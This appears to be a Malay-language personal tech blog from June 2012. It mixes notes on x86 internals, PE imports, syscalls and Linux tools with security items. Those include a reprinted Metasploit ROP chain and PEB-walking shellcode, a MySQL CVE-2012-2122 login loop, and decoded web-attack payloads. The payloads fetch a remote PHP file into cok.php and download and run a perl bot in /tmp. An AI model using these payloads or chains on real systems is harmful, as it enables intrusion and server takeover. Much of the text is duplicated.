29 June 2012
28 June 2012
String dalam memori
Andaikan x ada array of char dan
dalam memori:
Jadi kalau panggil ReadProcessMemory
*x='saya'ini bermaksud
x[0] = 's' ; >> 0x73 << dlm python : hex(ord('s'))
x[1] = 'a' ; >> 0x61
x[2] = 'y' ; >> 0x79
x[3] = 'a' ; >> 0x61
dalam memori:
Perhatikan: data dalam memori tak terbalik pun, berbanding kalau type adalah dword, atau word(artikel sebelum ni)
alamat data
Jadi kalau panggil ReadProcessMemory
-pada alamat 0x904F000
-sebanyak 4 byte
-hasil >> 0x73617961
dalam kes ni tak perlu nak reverse alamat (or anything yg related to LITTLE-ENDIAN) sebab char adalah 1 byte.
Bagaimana data disimpan dalam memori
x = 0x12345678
Andaikan x adalah DWORD variable, dan data x di simpan di alamat 0x904F000
Jika dilihat dalam Virtual Memory(blh guna immunity debugger, windbg), yang disimpan adalah
terbalik, iaitu 78563412
atau lebih terperinci spt dibawah:
Bila guna winapi ReadProcessMemory
Lihat parameter ke-3, lpBuffer berjenis LPVOID, maksudnya boleh guna char, word, dword etc.
REadProcessMemory(-1, 0x904f000, [array of dword], 4, 0)
hasil >>
Tapi kalau lpBuffer berjenis word(array)
REadProcessMemory(-1, 0x904f000, [array of word], 4, 0)
hasil >>
RUMUSAN:
word[0] bersaiz 2 byte,(ambil data dari 2 alamat)
jadi word[0] diambil dari alamat 0x904F000 (0x78) dan 0x904F001 (0x56)
tapi sebab cpu ni litte endian, kena baca dari alamat secara terbalik
dan word[1] akan ambil data dari
Manakala
Andaikan x adalah DWORD variable, dan data x di simpan di alamat 0x904F000
Jika dilihat dalam Virtual Memory(blh guna immunity debugger, windbg), yang disimpan adalah
terbalik, iaitu 78563412
atau lebih terperinci spt dibawah:
| alamat | data |
| 0x904F000 | 78 |
| 0x904F001 | 56 |
| 0x904F002 | 34 |
| 0x904F003 | 12 |
Bila guna winapi ReadProcessMemory
Syntax
BOOL WINAPI ReadProcessMemory( __in HANDLE hProcess, __in LPCVOID lpBaseAddress, __out LPVOID lpBuffer, __in SIZE_T nSize, __out SIZE_T *lpNumberOfBytesRead );
Lihat parameter ke-3, lpBuffer berjenis LPVOID, maksudnya boleh guna char, word, dword etc.
REadProcessMemory(-1, 0x904f000, [array of dword], 4, 0)
hasil >>
dword[0] = 305419896 ; yg mana hex(dword[0]) akan dapat semula nilai > 0x12345678
Tapi kalau lpBuffer berjenis word(array)
REadProcessMemory(-1, 0x904f000, [array of word], 4, 0)
hasil >>
word[0] = 22136 ; yg mana hex(word[0]) akan dapat semula nilai > 0x5678dan
word[1] = 4660 ; yg mana hex(word[1]) akan dapat semula nilai > 0x1234
RUMUSAN:
word[0] bersaiz 2 byte,(ambil data dari 2 alamat)
jadi word[0] diambil dari alamat 0x904F000 (0x78) dan 0x904F001 (0x56)
tapi sebab cpu ni litte endian, kena baca dari alamat secara terbalik
0x904F001 (0x56)
0x904F000 (0x78) >> 0x5678
dan word[1] akan ambil data dari
0x904F003 (0x12) dan
0x904F002 (0x34) >> 0x1234
Manakala
dword pulak bersaiz 4 byte. (ambil data dari 4 alamat), so dword[0] akan ambil data dari
Bagaimana pula kalau char/byte ??
hint: char saiz 1 byte. (ambil data dari 1 alamat)
0x904F003 (0x12) dan
0x904F002 (0x34) dan
0x904F001 (0x56) dan
0x904F000 (0x78) >> 0x12345678
Bagaimana pula kalau char/byte ??
hint: char saiz 1 byte. (ambil data dari 1 alamat)
26 June 2012
semak IAT(import adress table)
File: msvcr71.dll
ASLR: no
DLL ni hanya import funtion dari kernel32.dll sahaja.
PE_header.ImageBaseAddress = 7c340000 (dlm Optional Header)
PE_header.ImportTableAddress = 49298(rva) =7c389298(va)
[PE_header.ImportTableAddress + 0] = OFT
[PE_header.ImportTableAddress + 4] = TimeDateStamp
[PE_header.ImportTableAddress + 8] = ForwarderChain
[PE_header.ImportTableAddress + c] = NameRVA
[PE_header.ImportTableAddress + 10] = FT
1) OFT : 7c389298.
[7c389298] = 0492d0(va) = 7c3892d0(va)
7c3892d0 adalah permulaan array 4 byte yang mengandungi pointer ke string nama fungsi winAPI.
| index | Adr X | Content of X (rva) |
ImageBase + rva = (va) |
Content (va) |
Content (va + 2) |
| 0 | 7c3892d0 | 4953c | 7c38953c | 65 01 | GetModuleFileNameA |
| 1 | 7c3892d4 | 49552 | 7c389552 | 66 01 | GetModuleFileNameW |
| 2 | 7c3892d8 | 49568 | 7c389568 | AB 00 | ExitProcess |
| 50 | 7c389410 | 49af4 | 7c389af4 | 5b 03 | VirtualProtect |
2) Nama RVA: 7c3892a8
Pointer kepada nama module >> KERNEL32.dll
3) FT: 3A000
Pointer ke array yg simpan alamat fungsi winapi. Indeks-nya sama turutan dengan OFT.
contoh utk cari alamat VirtualProtect:
Gelinter item dalam array OFT,
jika pointer tersebut = NamaFungsi,
simpan no Indeks pada eax.
jmp [eax]
22 June 2012
ROP Guna "hard-coded address" (IAT)
metasploit: ms12-037
Ada 2 rop implementation, satu utk xp sp3, satu lagi utk win7 sp1
Merujuk rop utk win7 sp1, guna msvcr71.dll( jre-6 update-26)
Ada 2 rop implementation, satu utk xp sp3, satu lagi utk win7 sp1
Merujuk rop utk win7 sp1, guna msvcr71.dll( jre-6 update-26)
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN 0x00001000, # (dwSize) 0x7c347f98, # RETN (ROP NOP) 0x7c3415a2, # JMP [EAX] 0xffffffff, 0x7c376402, # skip 4 bytes 0x7c345255, # INC EBX # FPATAN # RETN 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN 0x7c344f87, # POP EDX # RETN 0x00000040, # flNewProtect 0x7c34d201, # POP ECX # RETN 0x7c38b001, # &Writable location 0x7c347f97, # POP EAX # RETN 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll] 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN 0x7c345c30, # ptr to 'push esp # ret '
Baris 3 terakhir: (0x7c37a151 + 0x0EF )adalah merujuk kepada lokasi kawasan yang mana maklumat IAT disimpan utk dll msvcr71.dll. Data dalam alamat tersebut adalah pointer kepada kernel32.VirtualProtect.
Jadi, walaupun address hard-coded digunakan utk call VirtualProtect, tapi shellcode ini tetap portable.
Kudos to metasploit for expose this nice trick.
Arah kiblat
Setahun 2 kali matahari ada tepat atas kaabah.
1) 28 Mei 5:16pm
2) 16 Julai 5:28pm
Pada waktu ni, arah kiblat akan selari dengan bayang2.
ref: http://www.falak-online.net/download/istiwamataharikaabah.pdf
1) 28 Mei 5:16pm
2) 16 Julai 5:28pm
Pada waktu ni, arah kiblat akan selari dengan bayang2.
ref: http://www.falak-online.net/download/istiwamataharikaabah.pdf
21 June 2012
apa itu kuantum komputer
Penggunaan keterkaitan antara 2 entiti di aplikasikan dalam pembinaan komputer.
Apa dia keterkaitan (Entanglement)
Entanglement:
for dummies:
I'm hunger for more:
Apa dia keterkaitan (Entanglement)
Entanglement:
for dummies:
I'm hunger for more:
Dimensi
4th Dimension:
4th dimension for dummies:
hit me some more:
Now you think you understand the Third dimension? hmm. not quite.
4th dimension for dummies:
hit me some more:
Now you think you understand the Third dimension? hmm. not quite.
19 June 2012
18 June 2012
xpra : remote gui
run gui program pada remote server. Kelebihannya boleh detach dan re-attach semula tanpa matikan program tersebut.
pd server:
$ xpra start :7
$ DISPLAY=:7 firefox
pd client:
$ xpra attach ssh:10.0.0.1:7 ; # gui firefox akan terpapar di desktop client
$ CTRL +C ; # utk detach. program firefox takkan mati. run semula xpra attach utk continue session
lain:
xpra list
xpra version
pd server:
$ xpra start :7
$ DISPLAY=:7 firefox
pd client:
$ xpra attach ssh:10.0.0.1:7 ; # gui firefox akan terpapar di desktop client
$ CTRL +C ; # utk detach. program firefox takkan mati. run semula xpra attach utk continue session
lain:
xpra list
xpra version
python binary
2 baris berikut, sama:
packed_data = binascii.unhexlify('0100000061620000cdcc2c40')
packed_data = '0100000061620000cdcc2c40'.decode('hex')
16 June 2012
cari url gambar dalam album picasa
cara nak dapatkan url gambar dari album picasa.
<?php // Input $user_name = "xxxx@gmail.com"; $picasa_album_id = "5726978903470698481"; // nak cari album id, gi kat picasaweb, masuk album, klik rss. // build feed URL $feedURL ="https://picasaweb.google.com/data/feed/api/user/$user_name/albumid/$picasa_album_id"; // read feed into SimpleXML object $sxml = simplexml_load_file($feedURL); // get album names and number of photos in each $bil = 1; foreach ($sxml->entry as $entry) { $urlgambar = $entry->content['src']; $path = split('/', $urlgambar); $s800gambar = $path[0].'//'.$path[2].'/'.$path[3].'/'.$path[4].'/'.$path[5].'/'.$path[6].'/s800/'.$path[7]; print_r($path); print $s800gambar; $bil++; } ?>
15 June 2012
10.04 tak de new upgrade
dlm 10.04 (ubuntu)
# do-release-upgrade
No new release found
hairan, 12.04 dah lama kluar dah.
By default LTS kena tunggu first release point(12.04.1).
Tapi kalau tak sabar gak,
Tapi developer suggest tunggu 12.04.1
http://askubuntu.com/questions/125392/why-is-no-new-release-found-when-upgrading-10-04-to-12-04-lts
# do-release-upgrade
No new release found
hairan, 12.04 dah lama kluar dah.
By default LTS kena tunggu first release point(12.04.1).
Tapi kalau tak sabar gak,
do-release-upgrade -d
Tapi developer suggest tunggu 12.04.1
This is what the release notes say:
Upgrades from Ubuntu 10.04 LTS to 12.04 LTS do not work using the alternate CD or the server CD as a package repository. It is recommended that users running Ubuntu 10.04 LTS wait for the 12.04.1 LTS point release, scheduled for July, before upgrading. (988941)
http://askubuntu.com/questions/125392/why-is-no-new-release-found-when-upgrading-10-04-to-12-04-lts
unicode kepada shellcode
biasa jumpa dalam javascript
%u16eb%u41b9%f4de
Ia adalah unicode, bersaiz 16 bit(2Byte)
Oleh kerana x86 adalah little-endian, so kalau dilihat dalam virtual memory akan jadi spt berikut:
eb 16 b9 41 de f4
extra:
dlm memory, 1 location(address) boleh isi 8 bit.
Contoh
- alamat 13df000 : eb
- alamat 13df001 : 16
- alamat 13df002 : b9
- alamat 13df003 : 41
- alamat 13df004 : de
- alamat 13df005 : f4
Dulu I wonder kenapa %u16eb jadi [eb 16]? org kata little-endian, so kena terbalikkan. Tapi kenapa [eb] tu tak diterbalikkan jadi [be] plak? Maknanya instead of [eb 16], jadi [be 61]?
Rupanya little-endian ni hanya pada susunan alamat memori je. Tapi 8 bit yg dlm alamat tersebut tetap sama je.
13 June 2012
cld vs std
cld akan setkan DF(direction flag) kepada 0
std akan setkan DF kepada 1
DF akan tentukan nilai ESI menaik atau menurun utk arahan 'lodsd'
std akan setkan DF kepada 1
DF akan tentukan nilai ESI menaik atau menurun utk arahan 'lodsd'
mov esi, 40100; esi: 40100 cld ; DF: 0 lodsd ; esi: 40104 lodsd ; esi: 40108 std ; DF: 1 lodsd ; esi: 40104 lodsd ; esi: 40100
url gambar picasa bertukar
Dalam picasaweb, album properties:
Tiap kali set permisi 'Limited, anyone with the link' utk album , semua direct link ke setiap gambar dalam album tersebut akan bertukar.
So, kena set Limited dulu, pastu baru dptkan direct link ke setiap gambar.
Kalau tukar public, pastu tukar Limited semula, kena dapatkan semula url utk gambar, sebab url direct-link yg sebelum ni dah tak boleh pakai. << Apa punya features ni ????. Someone please tell picasa developer.
URL sebelum set limit:
https://lh5.googleusercontent.com/-D07UBBrM11k/T2F41a9GbZI/AAAAAAAAHcw/1GC_mXllVJ8/s800/bahan.JPG
URL selepas set kepada Limited:
https://lh5.googleusercontent.com/-D07UBBrM11k/T2F41a9GbZI/AAAAAAAAHc4/AXTkphgKDog/s800/bahan.JPG
Tiap kali set permisi 'Limited, anyone with the link' utk album , semua direct link ke setiap gambar dalam album tersebut akan bertukar.
So, kena set Limited dulu, pastu baru dptkan direct link ke setiap gambar.
Kalau tukar public, pastu tukar Limited semula, kena dapatkan semula url utk gambar, sebab url direct-link yg sebelum ni dah tak boleh pakai. << Apa punya features ni ????. Someone please tell picasa developer.
URL sebelum set limit:
https://lh5.googleusercontent.com/-D07UBBrM11k/T2F41a9GbZI/AAAAAAAAHcw/1GC_mXllVJ8/s800/bahan.JPG
URL selepas set kepada Limited:
https://lh5.googleusercontent.com/-D07UBBrM11k/T2F41a9GbZI/AAAAAAAAHc4/AXTkphgKDog/s800/bahan.JPG
Album Id Picasa
Cara nak dapat album ID dari picasaweb
Go to your PWA account and click on the album in question.
Click on the 'RSS' link to the right.
You should get something like the following:
ref: earth net
Go to your PWA account and click on the album in question.
Click on the 'RSS' link to the right.
You should get something like the following:
picasaweb.google.com/data/
Notice the long string of digits; that's your Album ID.ref: earth net
12 June 2012
cari kernel32.dll dalam virtual memory
 |
| TEB -> PEB -> kernel32 |
xor eax, eax ; nape la nak zero kan eax tu? mov eax, [fs:eax+0x30] ; eax =7ffdf000 mov eax, [eax + 0x0c] ; eax =774a7880 mov esi, [eax + 0x1c] ; esi = 000b1bc0 lodsd ; eax = 000b2000 ; esi = 000b1bc4 mov eax, [eax + 8] ; eax = 75600000 << lokasi kernel32.dll dlm va
Kalau faham,
1) apa value pada lokasi 0x000b1bc4?
2) apa value pada lokasi 0x000b2004?
ref : Practical Malware Analysis(ms/414)
1)774a789c
2)000b1bc0
KiServiceTable
KiServiceTable tak di export oleh kernel.
Cara nak dapatkannya ialah dari KeServiceDescriptorTable
typedef struct ServiceDescriptorTable {
SDE ServiceDescriptor[4];
} SDT;
typedef struct ServiceDescriptorEntry {
PDWORD KiServiceTable;
PDWORD CounterTableBase;
DWORD ServiceLimit;
PBYTE ArgumentTable;
} SDE;
KeServiceDescriptorTable.ServiceDescriptor[0].KiServiceTable < pointer ke KiServiceTable
KeServiceDescriptorTable.ServiceDescriptor[0].ServiceLimit < size array KiServiceTable
ServiceDescriptor yang lain tak pakai.
(KeServiceDescriptorTable.ServiceDescriptor[1], KeServiceDescriptorTable.ServiceDescriptor[2], KeServiceDescriptorTable.ServiceDescriptor[3], semua ni tak pakai)
ref:http://www.thehackademy.net/madchat/vxdevl/library/Defeating%20Kernel%20Native%20API%20Hookers%20by%20Direct%20KiServiceTable%20Restoration.pdf
Cara nak dapatkannya ialah dari KeServiceDescriptorTable
typedef struct ServiceDescriptorTable {
SDE ServiceDescriptor[4];
} SDT;
typedef struct ServiceDescriptorEntry {
PDWORD KiServiceTable;
PDWORD CounterTableBase;
DWORD ServiceLimit;
PBYTE ArgumentTable;
} SDE;
KeServiceDescriptorTable.ServiceDescriptor[0].KiServiceTable < pointer ke KiServiceTable
KeServiceDescriptorTable.ServiceDescriptor[0].ServiceLimit < size array KiServiceTable
ServiceDescriptor yang lain tak pakai.
(KeServiceDescriptorTable.ServiceDescriptor[1], KeServiceDescriptorTable.ServiceDescriptor[2], KeServiceDescriptorTable.ServiceDescriptor[3], semua ni tak pakai)
ref:http://www.thehackademy.net/madchat/vxdevl/library/Defeating%20Kernel%20Native%20API%20Hookers%20by%20Direct%20KiServiceTable%20Restoration.pdf
System Call
Ada 2.
1) INT 2E > Lama (Win 2000 dan sebelum)
ntdll!NtWriteFile:
77f8c552 mov eax, 0xed
77f8c557 lea edx, [esp+0x4]
77f8c55b int 2e
77f8c55d ret 0x24
eax: index dalam array KiServiceTableedx: pointer kpd parameter pertama utk function kernel-mode
interupt akan buat os baca IDT(interupt descriptor table). int 2e akan point kepada code KiSystemService dalam NTOSKRNL(kernel-mode).
KiSystemService akan baca KiServiceTable base dari nilai eax.
Dalam contoh ni, sebab eax ialah 0xed, function NtWriteFile akan dipanggil.
11 June 2012
awk
Payah betul nak ingat awk ni.
awk -F" " '$7 ~ /\=http/ {print $1, $2, $7}'
Satu lagi:
awk '{if ($8 >= 2*$9) {print $0;}}' input.cif > output.cif
awk -F" " '$7 ~ /\=http/ {print $1, $2, $7}'
Satu lagi:
awk '{if ($8 >= 2*$9) {print $0;}}' input.cif > output.cif
Komputer pun boleh cair
Kalau pujuk banyak kali, komputer pun boleh cair
while true; do mysql -u root mysql --password=baha; done
while true; do mysql -u root mysql --password=baha; done
memcmp issue
/*
* CVE-2012-2122 checker
*
* You may get differing results with/without -m32
*
* Joshua J. Drake
*/
#include
#include
int main(void) {
int one, two, ret;
time_t start = time(0);
time_t now;
srand(getpid()*start);
while (1) {
one = rand();
two = rand();
ret = memcmp(&one, &two, sizeof(int));
if (ret < -128 || ret > 127)
break;
time(&now);
if (now - start > 10) {
printf("Not triggered in 10 seconds, *probably* not vulnerable..\n");
return 1;
}
}
printf("Vulnerable! memcmp returned: %d\n", ret);
return 0;
}
/*
* CVE-2012-2122 checker
*
* You may get differing results with/without -m32
*
* Joshua J. Drake
*/
#include
#include
int main(void) {
int one, two, ret;
time_t start = time(0);
time_t now;
srand(getpid()*start);
while (1) {
one = rand();
two = rand();
ret = memcmp(&one, &two, sizeof(int));
if (ret < -128 || ret > 127)
break;
time(&now);
if (now - start > 10) {
printf("Not triggered in 10 seconds, *probably* not vulnerable..\n");
return 1;
}
}
printf("Vulnerable! memcmp returned: %d\n", ret);
return 0;
}
07 June 2012
cmp dan test
cmp eax,4 >> eax - 4
SF : signed flag. Tukar jadi satu jika hasil tolak eax dengan 4 bernilai negatif
ZF: zero flag. Tukar jadi satu jika hasil tolak eax dan 4 bernilai 0.
| instruction | Zero Flag | Sign Flag | Overflow Flag | | | JG | JE | JL |
|---|---|---|---|---|---|---|---|
| mov eax, 3 cmp eax,4 | 0 | 1 | 0 | - | - | jump | |
| mov eax, 4 cmp eax,4 | 1 | 0 | 0 | - | jump | - | |
| mov eax, 5 cmp eax,4 | 0 | 0 | 0 | jump | - | - |
test eax,4 >> bitwise 'AND' antara eax dan 4, Tukar flags SF, ZF, PF, CF, OF
| instruction | Zero Flag | Sign Flag | Overflow Flag | | | JG | JE | JL |
|---|---|---|---|---|---|---|---|
| mov eax, 3 test eax,4 | 1 | 0 | 0 | - | - | jump | |
| mov eax, 4 test eax,4 | 0 | 0 | 0 | - | jump | - | |
| mov eax, 5 test eax,4 | 0 | 0 | 0 | jump | - | - |
06 June 2012
serangan web
index.php?option=com_xxxxx&controller=..//..//..//..//..//..//..//..///proc/self/environ00
ini akan display environtment variable.
USER_AGENT juga akan di paparkan dalam environtment.
payload 1:
eval (base64_decode('ZWNobyAiYzBsaSMiLnBocF91bmFtZSgpLiIjYzBsaSI7IGlmK EBjb3B5KCJodHRwOi8vd3d3LmdvbGZkci5jby5rci9iYnMvaWNvbi9meC50eHQiLCJjb2sucGhwIikpIHsgZWNobyAiU1VDQ0VTUyI7 IH0= '));
>>
echo "c0li#".php_uname()."#c0li"; if(@copy("http://www.golfdr.co.kr/bbs/icon/fx.txt","cok.php")) { echo "SUCCESS"; }
payload 2:
eval (base64_decode('c3lzdGVtKCdybSAtcmYgL3RtcC94LWJvdDt3Z2V0IC AtTyAvdG1wL3gtYm90O3BlcmwgL3RtcC94LWJvdDtwZXJsIC90bXAveC1ib3Q7cGVybCAvdG1wL3gtYm90O3JtIC1yZiAvdG1wL3gtYm90Jyk7 '));
>>
system('rm -rf /tmp/x-bot;wget -O /tmp/x-bot;perl /tmp/x-bot;perl /tmp/x-bot;perl /tmp/x-bot;rm -rf /tmp/x-bot');
ini akan display environtment variable.
USER_AGENT juga akan di paparkan dalam environtment.
payload 1:
eval (base64_decode('ZWNobyAiYzBsaSMiLnBocF91bmFtZSgpLiIjYzBsaSI7IGlmK EBjb3B5KCJodHRwOi8vd3d3LmdvbGZkci5jby5rci9iYnMvaWNvbi9meC50eHQiLCJjb2sucGhwIikpIHsgZWNobyAiU1VDQ0VTUyI7 IH0= '));
>>
echo "c0li#".php_uname()."#c0li"; if(@copy("http://www.golfdr.co.kr/bbs/icon/fx.txt","cok.php")) { echo "SUCCESS"; }
payload 2:
eval (base64_decode('c3lzdGVtKCdybSAtcmYgL3RtcC94LWJvdDt3Z2V0IC AtTyAvdG1wL3gtYm90O3BlcmwgL3RtcC94LWJvdDtwZXJsIC90bXAveC1ib3Q7cGVybCAvdG1wL3gtYm90O3JtIC1yZiAvdG1wL3gtYm90Jyk7 '));
>>
system('rm -rf /tmp/x-bot;wget -O /tmp/x-bot;perl /tmp/x-bot;perl /tmp/x-bot;perl /tmp/x-bot;rm -rf /tmp/x-bot');
Tapi pelik sikit utk command wget -O /tmp/x-bot;
Apa yg mamat ni download? parameter O utk destinasi fail yg didownload. Tapi source URLnya tak de lak.
Mungkin ni intermediate attack, tapi run by hackers wannabe kot :)
05 June 2012
04 June 2012
libemu.emu_env_w32_eip_check(_env)
function ni utk semak samada eip adalah hooked winapi.
Masalahnya, kalau eip adalah hooked address utk winapi, libemu akan pandai-pandai tukar eip kepada next instruction(spt dah return dari winapi)
40100: B8 6D 13 86 7C mov eax, 0x7C86136D
40105: FF D0 call eax
40107: 31 C0 xor eax, eax
katakan: eip = 40105
emu.test(1) # current eip = 0x7C86136D
emu.env_w32_hook_check() # which will call emu_env_w32_eip_check(_env)
#peliknya lepas call kat atas, eip di set kepada 40107
#jadi profile takkan ada winApi hooked msg.
Masalahnya, kalau eip adalah hooked address utk winapi, libemu akan pandai-pandai tukar eip kepada next instruction(spt dah return dari winapi)
40100: B8 6D 13 86 7C mov eax, 0x7C86136D
40105: FF D0 call eax
40107: 31 C0 xor eax, eax
katakan: eip = 40105
emu.test(1) # current eip = 0x7C86136D
emu.env_w32_hook_check() # which will call
#peliknya lepas call kat atas, eip di set kepada 40107
#jadi profile takkan ada winApi hooked msg.
Subscribe to:
Posts (Atom)